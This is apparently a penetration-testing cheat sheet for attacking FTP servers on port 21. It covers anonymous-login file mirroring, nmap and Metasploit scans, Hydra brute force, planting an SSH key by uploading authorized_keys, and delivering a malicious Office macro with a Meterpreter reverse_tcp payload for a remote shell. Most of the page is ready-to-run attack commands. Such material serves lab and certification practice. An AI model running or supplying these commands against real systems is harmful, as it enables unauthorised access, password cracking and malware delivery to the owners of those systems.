FTP 21

checklist

  • Anonymous login

  • OS version

  • Other software: Check Program Files, yum.log, /bin

  • Password files

  • DLLs: Use for msfpescan / BOF targets

  • Upload potential: Do you have the ability to upload files?

  • Can you trigger execution of uploads?

  • Swap binaries

  • Public exploits: Check for any public exploits for FTP server software

Download All Directories and Files

  1. Mirror FTP directories with anonymous login:

    wget --mirror 'ftp://ftp_user:redcliff@10.10.10.59'

  2. If PASV transfer is disabled:

wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'

  1. If PASV is enabled:

bashCopy codesudo wget --mirror 'ftp://anonymous:anonymous@10.11.1.14'

FTP Information Gathering

  1. Grab FTP Banner via telnet:

    telnet -n 192.168.101.100 21

  2. Grab FTP Certificate if available:

    openssl s_client -connect 192.168.101.100:21 -starttls ftp

  3. Nmap FTP scan:

    • Scan FTP with scripts:

      nmap --script ftp-* -p 21 192.168.101.100

    • Basic FTP scan with version detection:

      nmap -sC -sV 192.168.101.162 --script=ftp-anon

    • Alternative (without brute forcing):

      nmap -p 21 --script="+ftp and not brute and not dos and not fuzzer" -vv -oN ftp > $ip

  4. Connect with Browser:

    ftp://anonymous:anonymous@192.168.101.100

Brute Force FTP Login

  1. Hydra Brute Force (Need Username):

    hydra -t 1 -l motherfucker -P rockyou.txt -vV 192.168.101.100 ftp

  2. Hydra with Sparta custom list (Requires Sparta tool):

    hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f > $ip ftp

  3. Msfconsole FTP scanning:

    msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' 
msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' 
msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' 
msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' 
msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'

SSH Key Deployment via FTP

  1. Generate SSH key:

    ssh-keygen

  2. Upload SSH key via FTP:

    ftp 10.10.10.10 anonymous:anonymous
put /root/.ssh/id_rsa.pub authorized_keys

  3. SSH into target:

    ssh user@10.10.10.10

FTP Passive Mode Detection

  • Passive mode at login: Indicates potential presence of a firewall in the system.

Exploiting MS Office Evil Macros

First Stage: Set up Reverse Shell

  1. Search for Office macro:

    msfconsole --→ search office macro
use /multi/fileformat/office_word_macro

  2. Set up Meterpreter reverse listener:

    set payload windows/meterpreter/reverse_tcp
set lhost 192.168.119.177
set disablepayloadhandler false
run

Second Stage: Upload and Execute Macro

  1. Change file extension:

    sudo mv msf.docm msf.doc

  2. Start Meterpreter listener:

    set payload windows/meterpreter/reverse_tcp
set exitonsession false
set lhost 192.168.119.177
set lport 4444
run -j

  3. Upload via FTP:

    ftp 10.10.10.10 21
put msf.doc
exit

  4. Catch Meterpreter session.

PreviousAttack Vectors by PortNextSSH 22

Last updated